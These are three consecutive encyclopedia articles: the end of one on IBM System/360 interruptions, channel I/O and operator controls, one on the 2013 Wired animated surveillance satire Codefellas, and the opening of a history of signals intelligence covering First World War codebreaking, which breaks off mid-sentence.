storage protect key does not match the PSW key. An addressing exceptionPoOps is recognized when a program attempts to access a storage location that is not currently available. This normally occurs with an address beyond the capacity of the machine, but it may also occur on machines that allow blocks of storage to be taken offline. A specification exceptionPoOps is recognized when an instruction has a length or register field with values not permitted by the operation, or when it has an operand address that does not satisfy the alignment requirements of the opcode, e.g., a LH instruction with an odd operand address on a machine without the byte alignment feature. A data exceptionPoOps is recognized when a decimal instruction specifies invalid operands, e.g., invalid data, invalid overlap. A fixed-point overflow exceptionPoOps is recognized when significant bits are lost in a fixed point arithmetic or shift instruction, other than divide. A fixed-point divide exceptionPoOps is recognized when significant bits are lost in a fixed point divide or Convert to Binary instruction. A decimal overflow exceptionPoOps is recognized when significant digits are lost in a decimal arithmetic instruction, other than divide. A decimal divide exceptionPoOps is recognized when significant bits are lost in a decimal divide instruction. The destination is not altered. An exponent overflow exceptionPoOps is recognized when the characteristic in a floating-point arithmetic operation exceeds 127 and the fraction is not zero. An exponent underflow exceptionPoOps is recognized when the characteristic in a floating-point arithmetic operation is negative and the fraction is not zero. A significance exceptionPoOps is recognized when the fraction in a floating-point add or subtract operation is zero. A floating-point divide exceptionPoOps is recognized when the fraction in the divisor of a floating-point divide operation is zero. Supervisor Call interruption A Supervisor Call interruptionPoOps occurs as the result of a Supervisor Call instruction; the system stores bits 8-15 of the SVC instruction as the Interruption Code. External interruption An ExternalPoOps interruption occurs as the result of certain asynchronous events. Bits 16-24 of the External Old PSW are set to 0 and one or more of bits 24-31 is set to 1 Machine Check interruption A Machine Check interruptionPoOps occurs to report unusual conditions associated with the channel or CPU that cannot be reported by another class of interruption. The most important class of conditions causing a Machine Check is a hardware error such as a parity error found in registers or storage, but some models may use it to report less serious conditions. Both the interruption code and the data stored in the scanout area at '80'x (128 decimal) are model dependent. Input/Output This article describes I/O from the CPU perspective. It does not discuss the channel cable or connectors, but there is a summary elsewhere and details can be found in the IBM literature. I/O is carried out by a conceptually separate processor called a channel. Channels have their own instruction set, and access memory independently of the program running on the CPU. On the smaller models (through 360/50) a single microcode engine runs both the CPU program and the channel program. On the larger models the channels are in separate cabinets and have their own interfaces to memory. A channel may contain multiple subchannels, each containing the status of an individual channel program. A subchannel associated with multiple devices that cannot concurrently have channel programs is referred to as shared; a subchannel representing a single device is referred to as unshared. There are three types of channels on the S/360: A byte multiplexer channel is capable of executing multiple CCWs concurrently; it is normally used to attach slow devices such as card readers and telecommunications lines. A byte multiplexer channel could have a number of selector subchannels, each with only a single subchannel, which behave like low-speed selector channels. A selector channel has only a single subchannel, and hence is only capable of executing one channel command at a time. It is normally used to attach fast devices that are not capable of exploiting a block multiplexer channel to suspend the connection, such as magnetic tape drives. A block multiplexer channel is capable of concurrently running multiple channel programs, but only one at a time can be active. The control unit can request suspension at the end of a channel command and can later request resumption. This is intended for devices in which there is a mechanical delay after completion of data transfer, e.g., for seeks on moving-head DASD. The block multiplexer channel was a late addition to the System/360 architecture; early machines had only byte multiplexer channels and selector channels. The block multiplexer channel was an optional feature only on the models 85 and 195. The block multiplexor channel was also available on the later System/370 computers. Conceptually peripheral equipment is attached to a S/360 through control units, which in turn are attached through channels. However, the architecture does not require that control units be physically distinct, and in practice they are sometimes integrated with the devices that they control. Similarly, the architecture does not require the channels to be physically distinct from the processor, and the smaller S/360 models (through 360/50) have integrated channels that steal cycles from the processor. Peripheral devices are addressed with 16-bit addresses., referred to as cua or cuu; this article will use the term cuu. The high 8 bits identify a channel, numbered from 0 to 6, while the low 8 bits identify a device on that channel. A device may have multiple cuu addresses. Control units are assigned an address "capture" range. For example, a CU might be assigned range 20-2F or 40-7F. The purpose of this is to assist with the connection and prioritization of multiple control units to a channel. For example, a channel might have three disk control units at 20-2F, 50-5F, and 80-8F. Not all of the captured addresses need to have an assigned physical device. Each control unit is also marked as High or Low priority on the channel. Device selection progresses from the channel to each control unit in the order they are physically attached to their channel. At the end of the chain the selection process continues in reverse back towards the channel. If the selection returns to the channel then no control unit accepted the command and SIO returns Condition Code 3. Control units marked as High Priority check the outbound CUU to be within their range. If so, then the I/O was processed. If not, then the selection was passed to the next outbound CU. Control units marked as Low Priority check for inbound (returning) CUU to be within their range. If so, then the I/O is processed. If not, then the selection is passed to the next inbound CU (or the channel). The connection of three controls unit to a channel might be physically -A-B-C and, if all are marked as High then the priority would be ABC. If all are marked low then the priority would be CBA. If B was marked High and AC low then the order would be BCA. Extending this line of reasoning then the first of N controllers would be priority 1 (High) or 2N-1 (Low), the second priority 2 or 2N-2, the third priority 3 or 2N-3, etc. The last physically attached would always be priority N. There are three storage fields reserved for I/O; a double word I/O old PSW, a doubleword I/O new PSW and a fullword Channel Address Word (CAW). Performing an I/O normally requires the following: initializing the CAW with the storage key and the address of the first CCW issuing a Start I/O (SIO) instruction that specifies the cuu for the operation waiting for an I/O interruption handling any unusual conditions indicated in the Channel Status Word (CSW) A channel program consists of a sequence of Channel Control Words (CCWs) chained together (see below.) Normally the channel fetches CCWs from consecutive doublewords, but a control unit can direct the channel to skip a CCW and a Transfer In Channel (TIC) CCW can direct the channel to start fetching CCWs from a new location. There are several defined ways for a channel command to complete. Some of these allow the channel to continue fetching CCWs, while others terminate the channel program. In general, if the CCW does not have the chain-command bit set and is not a TIC, then the channel will terminate the I/O operation and cause an I/O interruption when the command completes. Certain status bits from the control unit suppress chaining. The most common ways for a command to complete are for the count to be exhausted when chain-data is not set and for the control unit to signal that no more data transfers should be made. If Suppress-Length-Indication (SLI) is not set and one of those occurs without the other, chaining is not allowed. The most common situations that suppress chaining are unit-exception and unit-check. However, the combination of unit-check and status-modifier does not suppress chaining; rather, it causes the channel to do a command retry, reprocessing the same CCW. In addition to the interruption signal sent to the CPU when an I/O operation is complete, a channel can also send a Program-Controlled interruption (PCI) to the CPU while the channel program is running, without terminating the operation, and a delayed device-end interruption after the I/O completion interruption. Channel status These conditions are detected by the channel and indicated in the CSW.PoOps Program-controlled interruptionPoOps indicates that the channel has fetched a CCW with the PCI bit set. The channel continues processing; this interruption simply informs the CPU of the channel's progress. An example of the use of Program-controlled interruption is in the "Program Fetch" function of Contents Supervision, whereby the control program is notified that a Control/Relocation Record has been read. To ensure that this record has been completely read into main storage, a "disabled bit spin", one of the few which remains in the control program, is initiated. Satisfaction of the spin indicates that the Control/Relocation Record is completely in main storage and the immediately preceding Text Record may be relocated. After relocation, a NOP CCW is changed to a TIC and the channel program continues. In this way, an entire load module may be read and relocated while utilizing only one EXCP, and possibly only one revolution of the disk drive. PCI also has applications in teleprocessing access method buffer management. Incorrect lengthPoOps indicates that the data transfer for a command completed before the Count was exhausted. This indication is suppressed if the Suppress-Length-Indication bit in the CCW is set. Program checkPoOps indicates one of the following errors Nonzero bits where zeros are required An invalid data or CCW address The CAW or a TIC refers to a TIC Protection checkPoOps indicates that the protection key in the CAW is non-zero and does not match the storage protection key. Channel data checkPoOps indicates a parity error during a data transfer. Channel control checkPoOps indicates a channel malfunction other than Channel data check or Interface control check. Interface control checkPoOps indicates an invalid signal in the channel to control unit interface. Chaining checkPoOps indicates lost data during data chaining. Unit status These conditions are presented to the channel by the control unit or device.PoOps In some cases they are handled by the channel and in other cases they are indicated in the CSW. There is no distinction between conditions detected by the control unit and conditions detected by the device. AttentionPoOps indicates an unusual condition not associated with an ongoing channel program. It often indicates some sort of operator action like requesting input, in which case the CPU would respond by issuing a read-type command, most often a sense command (04h) from which additional information could be deduced. Attention is a special condition, and requires specific operating system support, and for which the operating system has a special attention table with a necessarily limited number of entries. Status modifierPoOps (SM) indicates one of three unusual conditions A Test I/O instruction was issued to a device that does not support it. A Busy status refers to the control unit rather than to the device. A device has detected a condition that requires skipping a CCW. A CCW with a command for which Status Modifier is possible will normally specify command chaining, in which case the SM is processed by the channel and does not cause an interruption. A typical channel program where SM occurs is ... Search Id Equal TIC *-8 Read Data where the TIC causes the channel to refetch the search until the device indicates a successful search by raising SM. Control unit endPoOps indicates that a previous control unit busy status has been cleared. BusyPoOps indicates that a device (SM=0) or a control unit (SM=1) is busy. Channel endPoOps indicates that the device has completed the data transfer for a channel command. There may also be an Incorrect length indication if the Count field of the CCW is exhausted, depending on the value of the Suppress-Length-Indication bit. Device endPoOps indicates that the device has completed an operation and is ready to accept another. DE may be signalled concurrently with CE or may be delayed. Unit checkPoOps indicates that the device or control unit has detected an unusual conditions and that details may be obtained by issuing a Sense command. Unit exceptionPoOps indicates that the device has detected an unusual condition, e.g., end of file. Channel Address Word The fullword Channel Address Word (CAW) contains a 4-bit storage protection key and a 24-bit address of the channel program to be started. Channel Command Word A Channel Command Word is a doubleword containing the following: an 8-bit channel Command CodePoOps a 24-bit addressPoOps a 5-bit flag fieldPoOps an unsigned halfword Count fieldPoOps CCW Command codes The low order 2 or 4 bits determine the six types of operations that the channel performs;. The encoding is The meaning of the high order six or four bits, the modifier bits, M in the table above, depends upon the type of I/O device attached, see e.g., DASD CKD CCWs. All eight bits are sent to and interpreted in the associated control unit (or its functional equivalent). Control is used to cause a state change in a device or control unit, often associated with mechanical motion, e.g., rewind, seek. Sense is used to read data describing the status of the device. The most important case is that when a command terminates with unit check, the specific cause can only be determined by doing a Sense and examining the data returned. A Sense command with the modifier bits all zero is always valid. A noteworthy deviation from the architecture is that DASD use Sense command codes for Reserve and Release, instead of using Control. CCW flags The flags in a CCW affect how it executes and terminates. Channel Status Word The Channel Status Word (CSW) provides data associated with an I/O interruption. The Protection Key field contains the protect key from the CAW at the time that the I/O operation was initiated for I/O complete or PCI interruptions.PoOps The Command Address field contains the address+8 of the last CCW fetched for an I/O complete or PCI interruption. However, there are 9 exceptionsPoOps. The Status field contains one byte of Channel status bits, indicating conditions detected by the channelPoOps, and one byte of Unit status bits, indicating conditions detected by the I/O unitPoOps. There is no distinction between conditions detected by the control unit and conditions detected by the device. The Residual Count is a half word that gives the number of bytes in the area described by the CCW that have not been transferred to or from the channelPoOps. The difference between the count in the CCW and the residual count gives the number of bytes transferred. Operator controls The architecture of System/360 specified the existence of several common functions, but did not specify their means of implementation. This allowed IBM to use different physical means, e.g., dial, keyboard, pushbutton, roller, image or text on a CRT, for selecting the functions and values on different processors. Any reference to key or switch should be read as applying to, e.g., a light-pen selection, an equivalent keyboard sequence. System Reset sends a reset signal on every I/O channel and clears the processor state; all pending interruptions are cancelled. System Reset is not guaranteed to correct parity errors in general registers, floating point registers or storage. System Reset does not reset the state of shared I/O devices. Initial Program Load (IPL)PoOps is a process for loading a program when there isn't a loader available in storage, usually because the machine was just powered on or to load an alternative operating system. This process is sometimes known as Booting. As part of the IPL facility the operator has a means of specifying a 12-bit device address, typically with three dials as shown in the operator controls drawing. When the operator selects the Load function, the system performs a System Reset, sends a Read IPL channel command to the selected device in order to read 24 bytes into locations 0-23 and causes the channel to begin fetching CCWs at location 8; the effect is as if the channel had fetched a CCW with a length of 24, and address of 0 and the flags containing Command Chaining + Suppress Length Indication. At the completion of the operation, the system stores the I/O address in the halfword at location 2 and loads the PSW from location 0. Initial program loading is typically done from a tape, a card reader, or a disk drive. Generally, the operating system was loaded from a disk drive; IPL from tape or cards was used only for diagnostics or for installing an operating system on a new computer. Emergency pull switchPoOps (Emergency power off, EPO) sends an EPO signal to every I/O channel, then turns off power to the processor complex. Because EPO bypasses the normal sequencing of power down, damage can result, and the EPO control has a mechanical latch to ensure that a customer engineer inspects the equipment before attempting to power it back on. Power onPoOps powers up all components of the processor complex and performs a system reset. Power offPoOps initiates an orderly power-off sequence. Although the contents of storage are preserved, the associated storage keys may be lost. The Interrupt keyPoOps causes an external interruption with bit 25 set in the External Old PSW. The Wait lightPoOps indicates that the PSW has bit 14 (wait) set; the processor is temporarily halted but resumes operation when an interruption condition occurs. The Manual lightPoOps indicates that the CPU is in a stopped state. The System lightPoOps indicates that a meter is running, either due to CPU activity or due to I/O channel activity. The Test lightPoOps indicates that certain operator controls are active, when certain facilities, e.g., INSTRUCTION STEP, have been used by a Diagnose instruction or when abnormal thermal conditions exist. The details are model dependent. The Load lightPoOps is turned on by IPL and external start. It is turned off by loading the PSW from location 0 at the completion of the load process. The Load unitPoOps controls provide the rightmost 11 bits of the device from which to perform an IPL. The Load KeyPoOps starts the IPL sequence. The Prefix Select Key SwitchPoOps selects whether IPL will used the primary prefix or the alternative prefix. The System-Reset KeyPoOps initiates a System Reset. The Stop KeyPoOps puts the CPU in a stopped state; channel programs continue running and interruption conditions remain pending. The Rate SwitchPoOps determines the mode in which the processor fetches instructions. Two modes are defined by the architecture: PROCESS INSTRUCTION STEP The Start KeyPoOps initiates instruction fetching in accordance with the setting of the Rate Switch. The Storage-Select SwitchPoOps determines the type of resource accessed by the Store Key and Display Key. Three selections are defined by the architecture: Main storage General registers Floating-point registers The Address SwitchesPoOps specify the address or register number for the Store Key, Display Key and, on some models, the Set IC Key.. The Data SwitchesPoOps specify the data for the Store Key and, on some models, the Set IC Key. The Store KeyPoOps stores the value in the Data Switches as specified by the Storage-Select Switch and the Address Switches. The Display KeyPoOps displays the value specified by the Storage-Select Switch and the Address Switches. The Set IC=PoOps sets the instruction address portion of the PSW from the Data Switches or the Address Switches, depending on the model. The Address-Compare SwitchesPoOps select the mode of comparison and what is compared. Stop on instruction address compare is present on all models, but stop on data address compare is only present on some models. The Alternate-Prefix LightPoOps is on when the prefix trigger is in the alternate state. Optional features Byte-aligned operands On some models the alignment requirements for some problem-state instructions were relaxed. There is no mechanism to turn off this feature, and programs depending on receiving a program check type 6 (alignment) on those instructions must be modified. Decimal arithmetic The decimal arithmetic feature provides instructions that operate on packed decimal data. A packed decimal number has 1-31 decimal digits followed by a 4-bit sign. All of the decimal arithmetic instructions except PACK and UNPACK generate a Data exception if a digit is not in the range 0-9 or a sign is not in the range A-F. Direct Control The Direct ControlPoOps feature provides six external signal lines and an 8-bit data path to/from storage. Floating-point arithmetic The floating-point arithmetic feature provides 4 64-bit floating point registers and instructions to operate on 32 and 64 bit hexadecimal floating point numbers. The 360/85 and 360/195 also support 128 bit extended precision floating point numbers. Interval timer If the interval timer feature is installed, the processor decrements the word at location 80 ('50'X) at regular intervals; the architecture does not specify the interval but does require that value subtracted make it appear as though 1 were subtracted from bit 23 300 times per second. The smaller models decremented at the same frequency (50 Hz or 60 Hz) as the AC power supply, but larger models had a high resolution timer feature. The processor causes an External interruption when the timer goes to zero. Multi-system operationMulti-system operation''PoOps is a set of features to support multi-processor systems, e.g., Direct Control, direct address relocation (prefixing). Storage protection If the storage protection feature is installed, then there is a 4-bit storage key associated with every 2,048-byte block of storage and that key is checked when storing into any address in that block by either a CPU or an I/O channel. A CPU or channel key of 0 disables the check; a nonzero CPU or channel key allows data to be stored only in a block with the matching key. Storage Protection was used to prevent a defective application from writing over storage belonging to the operating system or another application. This permitted testing to be performed along with production. Because the key was only four bits in length, the maximum number of different applications that could be run simultaneously was 15. An additional option available on some models was fetch protection. It allowed the operating system to specify that blocks were protected from fetching as well as from storing. Deviations and extensions The System/360 Model 20 is radically different and should not be considered to be a S/360. The System/360 Model 44 is missing certain instructions, but a feature allowed the missing instructions to be simulated in hidden memory thus allowing the use of standard S/360 operating systems and applications. Some models have features that extended the architecture, e.g., emulation instructions, paging, and some models make minor deviations from the architecture. Examples include: The multisystem feature on the S/360-65 which modifies the behavior of the direct control feature and of the Set System Mask (SSM) instruction. The System/360 Model 67-2 had similar, but incompatible, changes. Some deviations served as prototypes for features of the S/370 architecture. See also Memory protection key Notes ReferencesS360''' Further reading Chapter 3 (pp. 41110) describes the System/360 architecture. External links Introduction to IBM System/360 Architecture (Student Text) Computer architecture Computing platforms architecture Instruction set architectures Computer-related introductions in 1964
39756995
https://en.wikipedia.org/wiki/Codefellas
Codefellas
Codefellas is an American animated political satire web series starring Emily Heller and John Hodgman distributed by Wired magazine. It was created by David Rees and Brian Spinks from an idea by Robert Green. Background On June 6, 2013, former NSA contractor Edward Snowden leaked the existence of PRISM, an electronic surveillance program intended to monitor e-mail and phone call activity in the United States to identify possible terrorist threats, to the newspapers The Guardian and The Washington Post. Condé Nast Publications, who produces Wired magazine, said Codefellas would provide "comedic relief in light of current events dominating the national news cycle." After Wired joined Condé Nast's Digital Video Network, five original web series were announced for Wireds video channel including Codefellas and Mister Know-It-All. Codefellas is Wired's first scripted series. Production Codefellas was scripted by Get Your War On cartoonist David Rees and Brian Spinks, who produced Get Your War On for The Huffington Post. Flat Black Films, the animation and software company who worked on the Richard Linklater films Waking Life and A Scanner Darkly, worked on the rotoscoping and lipsyncing. Twelve episodes of Codefellas were planned and produced. The first episode, "When Topple Met Winters", premiered on June 21, 2013. The second episode, "Meet Big Data", premiered on June 26, 2013. The third episode, "How to Hack a Website", premiered on July 10, 2013. The fourth episode, "The AntiSocial Network", premiered on July 17, 2013. The fifth episode, "Spy vs. Spy", premiered on July 24, 2013. The sixth episode, "Blackmail at 4:20", premiered on July 31, 2013. The seventh episode, "25 Reasons the NSA Should Hire Buzzfeed Staffers", premiered on August 14, 2013. The eighth episode, "How to Kill Your Boss", premiered on August 21, 2013. The ninth episode, "How to Hack a Telegram", premiered on August 28, 2013. The tenth episode, "How to Cheat to Win", premiered on September 4, 2013. The eleventh episode, "Shout to All My Lost Spies", premiered on September 11, 2013. The twelfth episode, "The Cougar Lies with Spanish Moss", premiered on September 18, 2013. Story In the first episode, "When Topple Met Winters", protégé hacker Nicole Winters (Emily Heller) who works for "Special Projects", an electronic surveillance governmental agency, receives a call from elderly Special Agent Henry Topple (John Hodgman) informing her that she has just been assigned to him to spy on the general public. In the second episode, "Meet Big Data", Agent Topple checks up on how Winters is settling into her new job at "Special Projects". Topple asks Winters about her surveillance of e-mails and in turn reveals his lack of understanding with modern computing. The conversation then trails off into the secret history of how fake mustaches were involved with the United States' national security. In the third episode, "How to Hack a Website", Agent Topple instructs Winters to hack a website. It is revealed that Topple merely used Winters's hacking expertise to remember the password to his old GeoCities e-mail. After Topple asks what e-mails are in his inbox, Winters finds an urgent message from 1998 on a secret project involving Topple's past partner Logan and a "test subject". In the fourth episode, "The AntiSocial Network", Agent Topple calls Winters about a supposed alert from PRISM on a cyberterrorist group called "Evite" infiltrating their networks and a subsequent attack. In the course of conversation, it is revealed that it is only an invitation from Topple's co-worker Doug for his retirement party described as a "big blow-out." Blaming the terror alert from PRISM on boredom, Winters brings up Facebook, a social network. Topple then calls Facebook "the smartest way to keep people dumb since we started fluoridating the water." Winters then admonishes Topple for having her to have to fill out a "88-J" incident form because of revealing classified information so candidly. Since "88-J" incident forms are only filled out by supervisors, Topple realizes Winters was promoted to become Topple's superior. In the fifth episode, "Spy vs. Spy", Winters calls Topple back since she was busy with a briefing. As Topple was not invited to the meeting, he passed the time watching telenovelas. Winters complains about his unprofessionalism and reveals that she had not slept well because of a list of troubles the night before. It turns out that the troubles were all perpetrated by Topple's ability to use national security at his disposal as he is still upset over Winters's recent promotion. In the sixth episode, "Blackmail at 4:20", Topple finds his personal accounts with Walgreens, Amtrak, MCI, and so forth have been hacked because of Winters. In retaliation, Topple orders a "toilet water sample" and finds that Winters is a drug user, which is grounds for termination. Coming to a compromise, Winters discloses to Topple her secret project: stopping a North Korean computer virus. Per their agreement, Topple gets to collaborate with Winters on the secret project as well as getting full credit for it. In the seventh episode, "25 Reasons the NSA Should Hire Buzzfeed Staffers", Topple sends Winters a fax of his analysis of the North Korean computer virus called "Staxnut". As the two converse on the computer virus, it is revealed that the computer virus could replace all American digital content with North Korean flag dancing. Given that North Korea is busy producing flags, there is still time to stop the virus. However, Topple realizes it would wipe out electronic dance music (and other media) he loathes and thus realizes his dilemma. In the eighth episode, "How to Kill Your Boss", Winters informs Topple that she called Chief Deputy Rollins and that Rollins does not want Topple on the Staxnut project. Annoyed that he is not involved with the project, Topple lists off the people he has killed. In the course of the conversation, Winters receives an alert that the Chief Deputy was murdered. Reception Commercial As of June 26, 2013, Codefellas first episode "When Topple Met Winters" has garnered "more than 266,000 views." Critical reception Cory Doctorow of Boing Boing called Codefellas "pretty promising stuff!" Eike Kühl of Die Zeit said the first two episodes "shine primarily by the bizarre dialogues of unequal protagonists." Kate Hutchinson and Gwilym Mumford of The Guardian called Codefellas "very odd", saying "it acts well as an accompaniment to the more hyperactive comedy of Archer." Charlie Anders of io9 called Codefellas "ridiculously funny." E. D. W. Lynch of Laughing Squid called Codefellas "hilarious." Sherwin Siy, VP of legal affairs for consumer advocacy group Public Knowledge, took issue with the premise, saying "It'd be a shame if people started to view pervasive government surveillance as another laughable daily chore, like traffic or boring meetings. On the other hand, it's entirely possible for good comedy to poke at and explore sensitive and enraging issues." David Haglund of Slate said "I'm looking forward to the rest." Bradford Evans of Splitsider called Codefellas "a fast, funny comedy that does for domestic spying what Archer does for international espionage." Sam Gutelle of Tubefilter praised Codefellas as "somewhere between Doonesbury and Archer" and said that it "has a chance to become the first smash hit across Conde Nast's network of YouTube channels." See also Get Your War On List of rotoscoped works List of Web television series NSA in popular culture References External links Official site 2013 American television series debuts 2013 web series debuts American comedy web series Political web series American political satire Political satirical television series American satirical television shows Wired (magazine) 2010s YouTube series Works about the National Security Agency 2013 American television series endings
13813961
https://en.wikipedia.org/wiki/Signals%20intelligence%20in%20modern%20history
Signals intelligence in modern history
Before the development of radar and other electronics techniques, signals intelligence (SIGINT) and communications intelligence (COMINT) were essentially synonymous. Sir Francis Walsingham ran a postal interception bureau with some cryptanalytic capability during the reign of Elizabeth I, but the technology was only slightly less advanced than men with shotguns, during World War I, who jammed pigeon post communications and intercepted the messages carried. Flag signals were sometimes intercepted, and efforts to impede them made . The middle 19th century rise of the telegraph allowed more scope for interception and spoofing of signals, as shown at Chancellorsville. Signals intelligence became far more central to military (and to some extent diplomatic) intelligence generally with the mechanization of armies, development of blitzkrieg tactics, use of submarine and commerce raiders warfare, and the development of practicable radio communications. Even measurement and signature intelligence (MASINT) preceded electronic intelligence (ELINT), with sound ranging techniques for artillery location. SIGINT is the analysis of intentional signals for both communications and non-communications (e.g., radar) systems, while MASINT is the analysis of unintentional information, including, but not limited to, the electromagnetic signals that are the main interest in SIGINT. Origins Electronic interception appeared as early as 1900, during the Boer Wars. The Royal Navy had installed wireless sets produced by Marconi on board their ships in the late 1890s and some limited wireless signalling was used by the British Army. Some wireless sets were captured by the Boers, and were used to make vital transmissions. Since the British were the only people transmitting at the time, no special interpretation of the signals was necessary. The Imperial Russian Navy also experimented with wireless communications under the guidance of Alexander Popov, who first installed a wireless set on a grounded battleship in 1900. The birth of signals intelligence in a modern sense dates to the Russo-Japanese War. As the Russian fleet prepared for conflict with Japan in 1904, the British ship HMS Diana stationed in the Suez canal was able to intercept Russian naval wireless signals being sent out for the mobilization of the fleet, for the first time in history. "An intelligence report on signals intercepted by HMS Diana at Suez shows that the rate of working was extremely slow by British standards, while the Royal Navy interpreters were particularly critical of the poor standard of grammar and spelling among the Russian operators". The Japanese also developed a wireless interception capability and succeeded in listening in to the then primitive Russian communications. Their successes emphasized the importance of this new source of military intelligence, and facilities for the exploitation of this information resource were established by all the major powers in the following years. The Austro-Hungarian Evidenzbureau was able to comprehensively monitor the progress of the Italian army during the Italo-Turkish War of 1911 by monitoring the signals that were sent by a series of relay stations from Tripoli to Rome. In France, Deuxième Bureau of the Military General Staff was tasked with radio interception. World War I It was over the course of the War that the new method of intelligence collection - signals intelligence - reached maturity. The British in particular built up great expertise in the newly emerging field of signals intelligence and codebreaking. Failure to properly protect its communications fatally compromised the Russian Army in its advance early in World War I and led to their disastrous defeat by the Germans under Ludendorff and Hindenburg at the Battle of Tannenberg. France had significant signals intelligence in World War I. Commandant Cartier developed a system of wireless masts, including one on the Eiffel Tower to intercept German communications. The first such station was built as early as 1908, although was destroyed by flooding a few years afterward. In the early stages of the war, French intercepts were invaluable for military planning and provided the crucial intelligence to commander-in-chief Joseph Joffre that enabled him to carry out the successful counterattack against the Germans at the Marne in September 1914. In 1918, French intercept personnel captured a message written in the new ADFGVX cipher, which was cryptanalyzed by Georges Painvin. This gave the Allies advance warning of the German 1918 Spring Offensive. US communications monitoring of naval signals started in 1918, but was used first as an aid to naval and merchant navigation. In October 1918, just before the end of the war, the US Navy installed its first DF installation at its station at Bar Harbor, Maine, soon joined by five other Atlantic coast stations, and then a second group of 14 installations. These stations, after the end of World War I, were not used immediately for intelligence. While there were 52 Navy medium wave (MF) DF stations in 1924, most of them had deteriorated. Cracking the German naval codes By the start of the First World War, a worldwide commercial undersea communication cable network had been built up over the previous half-century, allowing nations to transmit information and instructions around the world. Techniques for intercepting these messages through ground returns were developed, so all cables running through hostile territory could in theory be intercepted. On the declaration of war, one of Britain's first acts was to cut all German undersea cables. On the night of 3 August 1914, the cable ship Alert located and cut Germany's five trans-Atlantic cables, which ran down the English Channel. Soon after, the six cables running between Britain and Germany were cut. This forced the Germans to use either a telegraph line that connected through the British network and could be tapped, or through radio which the British could then intercept. The destruction of more secure wired communications, to improve the intelligence take, has been a regular practice since then. While one side may be able to jam the other's radio communications, the intelligence value of poorly secured radio may be so high that there is a deliberate decision not to interfere with enemy transmissions. Although Britain could now intercept German communications, codes and ciphers were used to hide the meaning of the messages. Neither Britain nor Germany had any established organisations to decode and interpret the messages at the start of the war - the Royal Navy had only one wireless station for intercepting messages, at Stockton-on-Tees. However, installations belonging to the Post Office and the Marconi Company, as well as private individuals who had access to radio equipment, began recording messages from Germany. Realizing that the strange signals they were receiving were German naval communications, they brought them to the Admiralty. Rear-Admiral Henry Oliver appointed Sir Alfred Ewing to establish an interception and decryption service. Among its early recruits were Alastair Denniston, Frank Adcock, John Beazley, Francis Birch, Walter Horace Bruford, William Nobby Clarke, Frank Cyril Tiarks and Dilly Knox. In early November 1914 Captain William Hall was appointed as the new Director of the Intelligence division to replace Oliver. A similar organisation had begun in the Military Intelligence department of the War Office, which become known as MI1b, and Colonel Macdonagh proposed that the two organisations should work together. Little success was achieved except to organise a system for collecting and filing messages until the French obtained copies of German military ciphers. The two organisations operated in parallel, decoding messages concerning the Western Front. A friend of Ewing's, a barrister by the name of Russell Clarke, plus a friend of his, Colonel Hippisley, approached Ewing to explain that they had been intercepting German messages. Ewing arranged for them to operate from the coastguard station at Hunstanton in Norfolk. They formed the core of the interception service known as 'Y' service, together with the post office and Marconi stations, which grew rapidly to the point it could intercept almost all official German messages. In a stroke of luck, the SKM codebook was obtained from the German Light cruiser Magdeburg, which ran aground on the island of Odensholm off the coast of Russian-controlled Estonia. The books were formally handed over to the First Lord, Winston Churchill, on 13 October. The SKM by itself was incomplete as a means of decoding messages since they were normally enciphered as well as coded, and those that could be understood were mostly weather reports. An entry into solving the problem was found from a series of messages transmitted from the German Norddeich transmitter, which were all numbered sequentially and then re-enciphered. The cipher was broken, in fact broken twice as it was changed a few days after it was first solved, and a general procedure for interpreting the messages determined. A second important code - the Handelsverkehrsbuch (HVB) codebook used by the German navy - was captured at the very start of the war from the German-Australian steamer Hobart, seized off Port Philip Heads near Melbourne on 11 August 1914. The code was used particularly by light forces such as patrol boats, and for routine matters such as leaving and entering harbour. The code was used by U-boats, but with a more complex key. A third codebook was recovered following the sinking of German destroyer SMS S119 in a battle off Texel island. It contained a copy of the Verkehrsbuch (VB) codebook, intended for use in cables sent overseas to warships and naval attachés, embassies and consulates. Its greatest importance during the war was that it allowed access to communications between naval attachés in Berlin, Madrid, Washington, Buenos Aires, Peking, and Constantinople. The German fleet was in the habit each day of wirelessing the exact position of each ship and giving regular position reports when at sea. It was possible to build up a precise picture of the normal operation of the High Seas Fleet, indeed to infer from the routes they chose where defensive minefields had been place and where it was safe for ships to operate. Whenever a change to the normal pattern was seen, it immediately signalled that some operation was about to take place and a warning could be given. Detailed information about submarine movements was also available. Direction finding The use of radio receiving equipment to pinpoint the location of the transmitter was also developed during the war. Captain H.J. Round working for Marconi, began carrying out experiments with direction finding radio equipment for the army in France in 1915. Hall instructed him to build a direction finding system for the navy. This was sited at Lowestoft and other stations were built at Lerwick, Aberdeen, York, Flamborough Head and Birchington and by May 1915 the Admiralty was able to track German submarines crossing the North Sea. Some of these stations also acted as 'Y' stations to collect German messages, but a new section was created within Room 40 to plot the positions of ships from the directional reports. Room 40 had very accurate information on the positions of German ships, but the Admiralty priority remained to keep the existence of this knowledge secret. From June 1915 the regular intelligence reports of ship positions ceased to be passed to all flag officers, but only to Admiral Jellicoe himself. Similarly, he was the only person to receive accurate charts of German minefields prepared from Room 40 information. No attempts were made by the German fleet to restrict its use of wireless until 1917, and then only in response to perceived British use of direction finding, not because it believed messages were being decoded. It became increasingly clear, that as important as the decrypts were, it was of equal importance to accurately analyse the information provided. An illustration of this was provided by someone at the Admiralty who knew a little too much detail about SIGINT without fully understanding it. He asked the analysts where call sign "DK" was located, which was that used by the German commander when in harbour. The analysts answered his question precisely, telling him that it was "in the Jade River". Unfortunately the High Seas Fleet commander used a different identifier when at sea, going so far as to transfer the same wireless operator ashore so the messages from the harbour would sound the same. The misinformation was passed to Jellicoe commanding the British fleet, who acted accordingly and proceeded at a slower speed to preserve fuel. The battle of Jutland was eventually fought but its lateness in the day allowed the enemy to escape. Jellicoe's faith in cryptographic intelligence was also shaken by a decrypted report that placed the German cruiser SMS Regensburg near him, during the Battle of Jutland. It turned out that the navigator on the Ravensburg was off by in his position calculation. During Jutland, there was limited use of direction finding on fleet vessels, but most information came from shore stations. A whole string of messages were intercepted during the night indicating with high reliability how the German fleet intended to make good its escape, but the brief summary which was passed to Jellicoe failed to convince him of its accuracy in light of the other failures during the day. Zimmermann Telegram & Other Successes Room 40 played an important role in several naval engagements during the war, notably in detecting major German sorties into the North Sea. The battle of Dogger Bank was won in no small part due to the intercepts that allowed the Navy to position its ships in the right place. "Warned of a new German raid [on England] on the night of 23–24 January, by radio intercepts, [Admiral Sir David] Beatty’s force made a rendezvous off the Dogger Bank... The outnumbered Germans turned in flight. ... the Kaiser, fearful of losing capital ships, ordered his navy to avoid all further risks." It played a vital 